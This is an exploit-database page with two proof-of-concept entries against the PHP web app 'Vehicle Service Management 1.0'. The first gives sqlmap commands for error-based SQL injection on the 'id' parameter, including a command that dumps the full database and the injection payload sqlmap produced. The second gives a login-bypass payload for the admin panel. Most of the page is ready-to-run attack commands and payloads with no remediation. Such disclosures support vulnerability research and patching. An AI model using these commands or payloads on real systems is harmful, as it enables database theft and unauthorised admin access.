Share
## https://sploitus.com/exploit?id=PACKETSTORM:164369
# Exploit Title: Vehicle Service Managment 1.0 - SQL Injection Error Based   
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
Steps-To-Reproduce:  
Step 1 - Open sqlmap  
Step 2 โ€“ Enter the payload string for sqlmap (edit localhost to site address)  
Setp 3 - Dump database info.   
  
  
SQLMAP Command:  
  
  
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E  
  
Results:  
  
Parameter: id (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa  
  
  
Step 3:  
  
Dump the entire database.  
  
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump  
  
  
  
# Exploit Title: Vehicle Service Managment 1.0 - SQL Authentication Bypass  
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
Steps-To-Reproduce:  
Step 1 - Goto http://site/admin/login.php (to login)  
Step 2 โ€“ Enter the payload below for username and password  
Setp 3 - Login as admin!  
  
Payload:   
  
' or 1=1-- -  
  
# Profit